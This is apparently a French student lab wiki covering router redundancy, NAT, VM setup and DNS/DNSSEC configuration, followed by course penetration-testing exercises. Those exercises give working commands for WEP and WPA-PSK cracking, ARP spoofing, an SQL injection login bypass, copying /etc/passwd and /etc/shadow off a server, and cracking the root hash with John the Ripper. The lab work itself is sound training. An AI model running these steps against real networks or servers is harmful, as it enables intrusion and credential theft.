On utilise le mécanisme SLA pour décrémenter la priorité des routeurs 1 et lorsqu'un incident sur le routeur RENATER (192.168.44.1) est détecté.&lt;br /&gt;
Sur le premier routeur:&lt;br /&gt;
&lt;br /&gt;
 6509-E# ip sla 1&lt;br /&gt;
 6509-E# icmp-echo 192.168.44.1&lt;br /&gt;
 6509-E# frequency 300&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
 6509-E# ip sla schedule 1 life forever start-time now&lt;br /&gt;
 6509-E# track 1 ip sla 1&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
 6509-E# int vlan 333&lt;br /&gt;
 6509-E# vrrp 33 track 1 decrement 50&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
&lt;br /&gt;
Penser a passer le port relié à l'ISR en mode trunk sans quoi on ne poura pas passer d'un VLAN à l'autre&lt;br /&gt;
&lt;br /&gt;
 6509-E# int Te6/5&lt;br /&gt;
 6509-E# switchport trunk encapsulation dot1q&lt;br /&gt;
 6509-E# switchport mode trunk&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
&lt;br /&gt;
On fait la même chose sur le deuxième routeur:&lt;br /&gt;
&lt;br /&gt;
 C9200# ip sla 1&lt;br /&gt;
 C9200# icmp-echo 192.168.44.1&lt;br /&gt;
 C9200# frequency 300&lt;br /&gt;
 C9200# exit&lt;br /&gt;
 C9200# ip sla schedule 1 life forever start-time now&lt;br /&gt;
 C9200# track 1 ip sla 1&lt;br /&gt;
 C9200# exit&lt;br /&gt;
 C9200# int vlan 333&lt;br /&gt;
 C9200# vrrp 33 address-family ipv4&lt;br /&gt;
 C9200# track 1 decrement 50&lt;br /&gt;
 C9200# exit&lt;br /&gt;
&lt;br /&gt;
 C9200# int Gi1/0/2&lt;br /&gt;
 C9200# switchport mode trunk&lt;br /&gt;
 C9200# exit&lt;br /&gt;
 C9200# exit&lt;br /&gt;
&lt;br /&gt;
A présent l'ISR peut prendre le relais si la connexion à internet par le routeur de l'école ne fonctionne plus. &lt;br /&gt;
Il ne reste plus qu'a faire la Mascarade sur l'ISR (IPs VMS -&amp;gt; 1 IP publique du SDLS = NAT dynamique sans pool = Mascarade)&lt;br /&gt;
&lt;br /&gt;
===Mascarade===&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int loopback 0&lt;br /&gt;
 ISR4331# ip address 213.215.6.102 255.255.255.255&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# int bdi 531&lt;br /&gt;
 ISR4331# ip nat outside&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# int bdi 333&lt;br /&gt;
 ISR4331# ip nat inside&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# access-list 33 permit 193.48.57.176 0.0.0.15&lt;br /&gt;
 ISR4331# ip nat inside source list 33 int loopback 0 overload&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# ip route 193.48.57.176 255.255.255.255 100.64.0.16&lt;br /&gt;
&lt;br /&gt;
On utilise bien les adresses routés des VM (193.57.48...) et non les adresses privées (100.64....) sinon on serait incapable de revenir vers les VM car le routeur ne connait pas la route vers ces dernières.&lt;br /&gt;
&lt;br /&gt;
===Tests===&lt;br /&gt;
&lt;br /&gt;
On test dans un premier temps la connexion internet. Sur nos VM on remplace la gateway avec l'IP de l'ISR: 100.64.0.3.&lt;br /&gt;
&lt;br /&gt;
Pour tester la prise de relai de l'ISR, on débranche la connexion vers le routeur de l’école des deux routeurs R1 et R2. L'ISR passe bien Master au bout d'un certain temps (&amp;lt;300s).&lt;br /&gt;
&lt;br /&gt;
Il n'est cependant pas possible d’accéder à nos VM depuis cette nouvelle connexion sans que la VM initie la dite connexion. En effet, la mascarade mis en place ne permet pas à l'ISR de router vers l’intérieur, il faudrait utiliser des ports différents pour chaque connexion aux VMs.&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) ()==&lt;br /&gt;
Suite au prochain épisode&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible ici https://archives.plil.fr/vdubois-/PRA.git&lt;br /&gt;
&lt;br /&gt;
http://www.trompettedelamort.site/toto.html&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
 			      8		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS en IPV6==&lt;br /&gt;
&lt;br /&gt;
Dans le fichier db.trompettedelamort.site il suffit de rajouter deux entrées comme nous l'avons fait en IPV4&lt;br /&gt;
 ns1	IN	AAAA	2001:660:4401:60b2:216:3eff:fe6f:4f0b&lt;br /&gt;
 www	IN	AAAA	2001:660:4401:60b2:216:3eff:fe6f:4f0b&lt;br /&gt;
&lt;br /&gt;
Il faut penser à augmenter le Serial&lt;br /&gt;
Ensuite il suffit de ressigner les zones comme précedemment:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
&lt;br /&gt;
Puis relancer le serveur bind.&lt;br /&gt;
&lt;br /&gt;
Avec la commande:&lt;br /&gt;
 host -t soa trompettedelamort.site ns6.gandi.net&lt;br /&gt;
On peut vérifier que le changement a bien été pris en compte.&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données (11/30/2020)===&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible ici https://archives.plil.fr/vdubois-/PRA.git&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données (01/12/2020)===&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible ici https://archives.plil.fr/vdubois-/PRA.git&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54045</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54045"/>
				<updated>2020-11-30T13:53:35Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
